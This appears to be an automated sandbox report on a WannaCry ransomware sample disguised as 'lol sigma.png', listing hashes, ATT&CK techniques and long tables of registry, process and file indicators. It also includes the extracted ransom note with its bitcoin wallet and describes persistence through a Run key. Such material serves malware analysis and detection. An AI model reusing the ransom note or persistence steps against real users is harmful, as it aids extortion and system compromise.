wannacry | dc0e066dda94f846f61cc031d499b60eefd48a2d1fa54aff1a5b85def4fa072f

Analysis

max time kernel
1800s
max time network
1694s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
29-08-2024 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lol sigma.png
Size

581KB
MD5

c81328a92437a5fb47ad8ac7a201ecb9
SHA1

2abfdd3b313613984e5df397d8d61a134a5fdd6f
SHA256

dc0e066dda94f846f61cc031d499b60eefd48a2d1fa54aff1a5b85def4fa072f
SHA512

a832bf20cd76da90911102b51b74446c0ec33a552ee65214ce0f411a511507342f8ac7444eba11754b3bd23b26c61487c586bb8349db4987c7f8e11cfabbee94
SSDEEP

12288:lWvPh+N/YFnuDjzkJLwnIQWbKMjCWLl0JqOnTsQ6soQK:kI/8nkkV8IQMj96bnTffoQK

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD30EC.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 64 IoCs

pid	Process
4972	taskdl.exe
2036	@[email protected]
4396	@[email protected]
3356	taskhsvc.exe
2188	taskdl.exe
240	taskse.exe
3464	@[email protected]
4572	taskdl.exe
3824	taskse.exe
4176	@[email protected]
2324	taskdl.exe
2028	taskse.exe
3136	@[email protected]
2416	taskse.exe
5012	@[email protected]
992	taskdl.exe
2592	taskse.exe
2828	@[email protected]
4300	taskdl.exe
3344	taskse.exe
2076	@[email protected]
3904	taskdl.exe
2324	taskse.exe
2244	@[email protected]
2064	taskdl.exe
2908	taskse.exe
4872	@[email protected]
4192	taskdl.exe
2152	taskse.exe
548	@[email protected]
412	taskdl.exe
1140	taskse.exe
72	@[email protected]
2136	taskdl.exe
3716	taskse.exe
2316	@[email protected]
2776	taskdl.exe
2904	taskse.exe
884	@[email protected]
580	taskdl.exe
3748	taskse.exe
740	@[email protected]
1808	taskdl.exe
1644	taskse.exe
4500	@[email protected]
2612	taskdl.exe
1228	taskse.exe
392	@[email protected]
4176	taskdl.exe
2540	taskse.exe
2836	@[email protected]
3756	taskdl.exe
4360	taskse.exe
3100	@[email protected]
1088	taskdl.exe
2188	taskse.exe
1032	@[email protected]
4496	taskdl.exe
3112	taskse.exe
4560	@[email protected]
3996	taskdl.exe
4400	taskse.exe
2184	@[email protected]
3512	taskdl.exe

Loads dropped DLL 8 IoCs

pid	Process
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1256	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tcofzwqenj709 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
8	raw.githubusercontent.com
52	raw.githubusercontent.com
59	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	131.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133694105240887638"	chrome.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\.bin	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\஗Ǽ\ = "bin_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\潤瑭敲e㕗꬀耀\ = "bin_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\.bin\ = "bin_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\bin_auto_file	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\潤瑭敲e㕗꬀耀	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\bin_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\஗Ǽ	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\bin_auto_file\shell\Read	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\bin_auto_file\shell\Read\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\bin_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1984	reg.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Cryptowall.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Mamba.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Locky.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.RedBoot.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2932	chrome.exe
2932	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
4612	msedge.exe
4612	msedge.exe
2172	msedge.exe
2172	msedge.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe
3356	taskhsvc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4528	OpenWith.exe
3464	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
4612	msedge.exe
4612	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe
Token: SeShutdownPrivilege	2932	chrome.exe
Token: SeCreatePagefilePrivilege	2932	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
4612	msedge.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe
2932	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
4528	OpenWith.exe
2352	AcroRd32.exe
2352	AcroRd32.exe
2352	AcroRd32.exe
2352	AcroRd32.exe
2600	131.exe
4008	131.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
4884	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
864	OpenWith.exe
2036	@[email protected]
2036	@[email protected]
4396	@[email protected]
4396	@[email protected]
3464	@[email protected]
3464	@[email protected]
4176	@[email protected]
3136	@[email protected]
5012	@[email protected]
2828	@[email protected]
2076	@[email protected]
2244	@[email protected]
4872	@[email protected]
548	@[email protected]
72	@[email protected]
2316	@[email protected]
884	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 2088	2932	chrome.exe	87
PID 2932 wrote to memory of 2088	2932	chrome.exe	87
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 976	2932	chrome.exe	88
PID 2932 wrote to memory of 3384	2932	chrome.exe	89
PID 2932 wrote to memory of 3384	2932	chrome.exe	89
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90
PID 2932 wrote to memory of 3168	2932	chrome.exe	90

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3468	attrib.exe
2424	attrib.exe
2196	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\lol sigma.png"
1⤵
PID:3464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
